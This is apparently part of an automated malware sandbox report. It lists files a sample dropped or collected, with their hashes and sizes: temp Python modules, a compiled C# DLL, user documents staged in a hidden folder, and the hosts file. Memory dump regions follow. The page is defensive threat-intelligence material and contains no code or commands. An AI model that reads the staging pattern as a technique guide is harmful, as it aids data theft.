6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c

SHA512
3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45442\unicodedata.pyd

Filesize
295KB

MD5
8c42fcc013a1820f82667188e77be22d

SHA1
fba7e4e0f86619aaf2868cedd72149e56a5a87d4

SHA256
0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2

SHA512
3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lkqwcmec.mep.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\wkkjwmir\wkkjwmir.dll

Filesize
4KB

MD5
5a5c0e0e4f9da00bf019460b679f0cf8

SHA1
ff878efca3b9219c179bf341ab587bac4ed64a03

SHA256
f78cc1701817ad868f39e67a0458d2dc794fbd41eb28579c6427d30aa07db6e4

SHA512
ec0613cae9cbd51209903df48e99b573b0868960c7d9f99205ea3da3acf1a725142f5ad4bdd434e00d563470c98c2362bf2587eece791f2baa58921fc9ff35c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Desktop\AddLock.xlsx

Filesize
12KB

MD5
72ea15074b78e2bd11e5c878a751af37

SHA1
1350c852e397447c4a51704197d68244ca1e005a

SHA256
05681d013f0e4a5e87ca61828a305d8660bef4bf1de678d9f65fe104c2c2f36e

SHA512
82b9cfec91de286ba661db9476586102ec7d77f019750a7dca860db6fdedad36034d58bae82e07abf4cfb3397c84196a38f91cb1f08ecc6740a60ba72354012b

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Desktop\ConfirmCheckpoint.xlsx

Filesize
12KB

MD5
4e5dd88b775122bbddee317e6aee712f

SHA1
9c8e73b8f22ff39009cd58d10a17162a81127622

SHA256
36c91356adc275ff0a073c2ec974a2d2727e4da888d5a21899a85d0237e2413e

SHA512
b86f44b327e6281d436f9de288e208d81c8ce13c8577f478331df9ef465096850bb57e4e2b9e8d179c7cfc8b0b44a777d55733452ffd2691ecf255b64a2d6870

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Desktop\MountCheckpoint.docx

Filesize
16KB

MD5
0001eb3971162b99f9baee5a183b7be3

SHA1
25c133aa425e881377a6d6b8e967cec9ecc48ed0

SHA256
3298ef297cbd7ae3c24e0bf9daa083b79f712b852b5462de14129e91bc62fce3

SHA512
2cca51f0e0ebd29a72126255cd96ab42c429c7bda805717a06983fd551b68b3a4cf5ddead1226c4493ca612b2b9bc2e6f2ed73151458729f6c590b20c2535050

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Desktop\RenameReceive.docx

Filesize
21KB

MD5
85df02795f72b3eaf5c6535a3908e728

SHA1
9ce79a26c387eb0cc664b94ae7ab491ec6a48a7f

SHA256
d14a58c761ae546d5656f1e1853db4ec9865cd741be7afed57410a29a1707d12

SHA512
b3aebd3fc98829b763e338342709305d9760b0d37aafa24fc0b5634416f898fe00f6fd633d8659cb1ae167c42a7bf341080088d63ef7c6b8c70fb03050eedd57

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Desktop\SaveCompress.docx

Filesize
18KB

MD5
c86076c3b7b229277cec410b8aa36dbf

SHA1
769cc6a20dd8546c5335bc9cee28cf3f7e9c27bf

SHA256
723137cbc86fa997f8b75be61efc77768e2edab0708eaac2513e2918307cb2a7

SHA512
e1728328e04168d48555a8292f3aaaf5815a4fd9290ed06e5b955b6ae615c6e69f801428bc606df37d3697c27a1e14d42b52d79c6b9326a00b763634a420b64a

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Desktop\SelectFormat.xlsx

Filesize
11KB

MD5
2144887af5e0040e2ef3b4a8f36eee58

SHA1
1a7f5853bc22b3503208a83191b88777744b6dfe

SHA256
ec1e7591cee62f2ab54b986e7433b1781258c5c79f101a00942e629528e6288a

SHA512
a7125a61f9e82adcb175c423e925bf5eece06915c3dc9cd69d67cc1714d27bf8fccc9fe36eba230e40d2df048e4565deffab644edced40df35fb6cdf2ca43a8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Desktop\SwitchOut.mp4

Filesize
519KB

MD5
db48aa9f889b3568d659bfc416b980ee

SHA1
a6b7196bfaedd578efdeec3f688d5f0f5021082b

SHA256
3b3964dcbf2444ee98d46cd6167f2363b34df16a7ec8e8391507dd26486e8318

SHA512
3f37ede3e8f2682b94b1635873b92e809ca8fc6db9336ea732fc0a289a82fad213c81fe3a1409eb7747fab2d81d52a4e088424d3a5bb5c7ec57a4abd5df2838d

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Documents\BackupStart.xlsx

Filesize
382KB

MD5
6aca611fc7abcaec9cfc7b7b4641172f

SHA1
32b7a9d5de29846735ba673b4c2253b6ed119677

SHA256
378d06f4effcd572a655a3fb207c8a28fc72260be661f9cefe822c5ba931c6be

SHA512
bc90a270d3acf35271634f4adc04d6929838571337393f9cfb637eed16b1536b5d34041e117f5b91868fd71c46e8279f54aac9c0ec1001ff02a5e48179a8e619

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Documents\HideShow.xlsx

Filesize
13KB

MD5
480d98c79f9dd3456450cbc14fde221d

SHA1
21b78b268ab78f5ab6715dafd8e251e4cef13d84

SHA256
028751fe0e6ad9ff6450d499d81f72429b131c314f5cabff3f36a3ecbdecada2

SHA512
808436941e8c466b72d11d2f5183486a68ddbbf1adbfb31181f20683d30f960911cc4a65f3ac683785bcee522a814827b89448aac620b1691df60d3d99693ae3

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Documents\InstallCheckpoint.docx

Filesize
12KB

MD5
7beafcf8bc096d0f8e33e3f9696013ec

SHA1
84a53e1ecd58e805c569b0456035ec76b3423c02

SHA256
0fb4524e0771e7fc57c1ca19feb7fe0c9376ebc0ddeb81d85379287a6a903af0

SHA512
c91da33b07582f7605e7e78630a7ad633b45d4e00d975b6e0cf22f14c1cd273334242ef8f003ed3e7006ec02d9e7f80c976d92b79a868b56f5dc3c4dde411837

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Documents\InstallJoin.xls

Filesize
451KB

MD5
e7c2865d8738a709f5fb90356fb764f6

SHA1
7351f81714e8922f82f4d0664a1e91f2a3350a67

SHA256
4d35b2e43ef5dfc39122f6f7763353eb34e9dafd0ad22d4fea6334bee832aa70

SHA512
d7171de95fdda731b516692bbc50d489c237ebbf0dc322327f47b0aaafec98216b3e823eb7b53874b0f5be1a4f5c4c618c4dac5cb28b34eed55eb8b23f8032c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Documents\MoveShow.docx

Filesize
17KB

MD5
0c6d3e4d7d5e53ec3f33aeb5eb6b8b76

SHA1
f5c75499c3fb274c9fb1d6e11c69f3b7643da7ff

SHA256
20fe5220b7dc67f01c138d57c106f851ca7139b9ac7a5aadfba36d90ebc2f9d9

SHA512
242f21d02944f685bf72c11190d38aebbc97014ce75371e7989ecc3928910793167c00252c4a94d99e528790c5517c2dc2fa84d39ecd28718110fe05b95e8b12

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Documents\ResizeExpand.csv

Filesize
851KB

MD5
21200c182dad41cb183d35af8ea7612c

SHA1
7ed9b44976553b3b3ad90db4e62e6b7370d6974f

SHA256
f1fb4c9a3db92f9f088c47ebf7020c9fd63640ff6a5f69e80ede703abbda7033

SHA512
a789aa5d5f948ebdfd26576b6b051c323774ac9e3c9108cda7c390eed0096d353e27687bf188e499d28fa4ffe87993178d5bd9391f676e0e7f28b67fa9f92ba2

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ \Common Files\Documents\SaveUndo.pdf

Filesize
365KB

MD5
12d3fd7b7c49030c97716af44db1339d

SHA1
f9cbea9da7922a83ff038e71671d67d5ef5e5ab2

SHA256
2dfe7615896e878b909d8bdbb3ab354ffaa0a383de4b6647c1404e38ff60a7d0

SHA512
f39afa447ead545a9cc4c42b3909cc4dd53f622c8f1f5bde59d1ff53d9e93bb4850803db2d9b2ea129c315479b78e193d3542764efbc5bb622d3814f20c69465

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wkkjwmir\CSC9B5EDCE83FDB477193406DAB88C2EAB.TMP

Filesize
652B

MD5
e5e561f3d6bc202f0c2c1a738fc3d464

SHA1
3754aa653dfbc533fe19e68a0ce9fe00e0f4d14f

SHA256
01d6b85247576f22d4a65b63af187f7d170080c4e53230d4ffca4283edeeff3b

SHA512
4389a7dd75524ae696604013525e72675dc09ae71978ac7120eade3f5a43708d48c1bcb8833174698f667bc0958960189b02775d9cce727cf80b0a9637b19700

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wkkjwmir\wkkjwmir.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wkkjwmir\wkkjwmir.cmdline

Filesize
607B

MD5
2ccbcdac802d38faf43b2a5cf3ed1376

SHA1
6665acc5bc201f734131d56e463513c1d2818c35

SHA256
c5d69c093225e2432cb3607685b5038b0ea6b66b0ef7f3f7653e5e07c7d8d1d3

SHA512
86d39b91f04738b3a37eb0aa450fb823df5442b67627b053355616e86c584eb669992336c6c2094fa504aacdf1dcaa8986e74bfba4d8d5dbf5f0efab97977ecc

Download Submit
memory/2716-58-0x00007FFA08010000-0x00007FFA08033000-memory.dmp

Filesize
140KB

Download
memory/2716-25-0x00007FF9FF910000-0x00007FF9FFEF9000-memory.dmp

Filesize
5.9MB

Download
memory/2716-106-0x00007FFA08010000-0x00007FFA08033000-memory.dmp

Filesize
140KB

Download
memory/2716-79-0x00007FFA09610000-0x00007FFA0961D000-memory.dmp

Filesize
52KB

Download
memory/2716-183-0x00007FFA0DB20000-0x00007FFA0DB39000-memory.dmp

Filesize
100KB

Download
memory/2716-78-0x00007FFA08040000-0x00007FFA0806D000-memory.dmp

Filesize
180KB

Download
memory/2716-71-0x00007FFA08070000-0x00007FFA08093000-memory.dmp

Filesize
140KB

Download
memory/2716-73-0x00007FFA03850000-0x00007FFA03D70000-memory.dmp

Filesize
5.1MB

Download
memory/2716-315-0x00007FFA09940000-0x00007FFA09954000-memory.dmp

Filesize
80KB

Download
memory/2716-74-0x000002597E090000-0x000002597E5B0000-memory.dmp

Filesize
5.1MB

Download
memory/2716-72-0x00007FFA04100000-0x00007FFA041CD000-memory.dmp

Filesize
820KB

Download
memory/2716-248-0x00007FFA07440000-0x00007FFA07473000-memory.dmp

Filesize
204KB

Download
memory/2716-251-0x00007FFA04100000-0x00007FFA041CD000-memory.dmp

Filesize
820KB

Download
memory/2716-252-0x00007FFA03850000-0x00007FFA03D70000-memory.dmp

Filesize
5.1MB

Download
memory/2716-66-0x00007FFA07440000-0x00007FFA07473000-memory.dmp

Filesize
204KB

Download
memory/2716-64-0x00007FFA0D9B0000-0x00007FFA0D9BD000-memory.dmp

Filesize
52KB

Download
memory/2716-62-0x00007FFA0DB20000-0x00007FFA0DB39000-memory.dmp

Filesize
100KB

Download
memory/2716-60-0x00007FFA042F0000-0x00007FFA04467000-memory.dmp

Filesize
1.5MB

Download
memory/2716-81-0x00007FFA0DBA0000-0x00007FFA0DBB9000-memory.dmp

Filesize
100KB

Download
memory/2716-56-0x00007FFA0DBA0000-0x00007FFA0DBB9000-memory.dmp

Filesize
100KB

Download
memory/2716-54-0x00007FFA08040000-0x00007FFA0806D000-memory.dmp

Filesize
180KB

Download
memory/2716-47-0x00007FFA08070000-0x00007FFA08093000-memory.dmp

Filesize
140KB

Download
memory/2716-48-0x00007FFA0DBF0000-0x00007FFA0DBFF000-memory.dmp

Filesize
60KB

Download
memory/2716-107-0x00007FFA042F0000-0x00007FFA04467000-memory.dmp

Filesize
1.5MB

Download
memory/2716-82-0x00007FF9F2CA0000-0x00007FF9F2DBC000-memory.dmp

Filesize
1.1MB

Download
memory/2716-316-0x00007FFA09610000-0x00007FFA0961D000-memory.dmp

Filesize
52KB

Download
memory/2716-70-0x00007FF9FF910000-0x00007FF9FFEF9000-memory.dmp

Filesize
5.9MB

Download
memory/2716-76-0x00007FFA09940000-0x00007FFA09954000-memory.dmp

Filesize
80KB

Download
memory/2716-269-0x000002597E090000-0x000002597E5B0000-memory.dmp

Filesize
5.1MB

Download
memory/2716-294-0x00007FFA042F0000-0x00007FFA04467000-memory.dmp

Filesize
1.5MB

Download
memory/2716-288-0x00007FF9FF910000-0x00007FF9FFEF9000-memory.dmp

Filesize
5.9MB

Download
memory/2716-289-0x00007FFA08070000-0x00007FFA08093000-memory.dmp

Filesize
140KB

Download
memory/2716-317-0x00007FF9F2CA0000-0x00007FF9F2DBC000-memory.dmp

Filesize
1.1MB

Download
memory/2716-319-0x00007FFA08070000-0x00007FFA08093000-memory.dmp

Filesize
140KB

Download
memory/2716-327-0x00007FFA04100000-0x00007FFA041CD000-memory.dmp

Filesize
820KB

Download
memory/2716-326-0x00007FFA07440000-0x00007FFA07473000-memory.dmp

Filesize
204KB

Download
memory/2716-325-0x00007FFA0D9B0000-0x00007FFA0D9BD000-memory.dmp

Filesize
52KB

Download
memory/2716-324-0x00007FFA0DB20000-0x00007FFA0DB39000-memory.dmp

Filesize
100KB

Download
memory/2716-323-0x00007FFA042F0000-0x00007FFA04467000-memory.dmp

Filesize
1.5MB

Download
memory/2716-322-0x00007FFA08010000-0x00007FFA08033000-memory.dmp

Filesize
140KB

Download
memory/2716-321-0x00007FFA0DBA0000-0x00007FFA0DBB9000-memory.dmp

Filesize
100KB

Download
memory/2716-320-0x00007FFA08040000-0x00007FFA0806D000-memory.dmp

Filesize
180KB

Download
memory/2716-318-0x00007FFA0DBF0000-0x00007FFA0DBFF000-memory.dmp

Filesize
60KB

Download
memory/2716-314-0x00007FFA03850000-0x00007FFA03D70000-memory.dmp

Filesize
5.1MB

Download
memory/2716-303-0x00007FF9FF910000-0x00007FF9FFEF9000-memory.dmp

Filesize
5.9MB

Download
memory/3332-92-0x000002532B8B0000-0x000002532B8D2000-memory.dmp

Filesize
136KB

Download
memory/4324-189-0x0000019FA9460000-0x0000019FA9468000-memory.dmp

Filesize
32KB

Download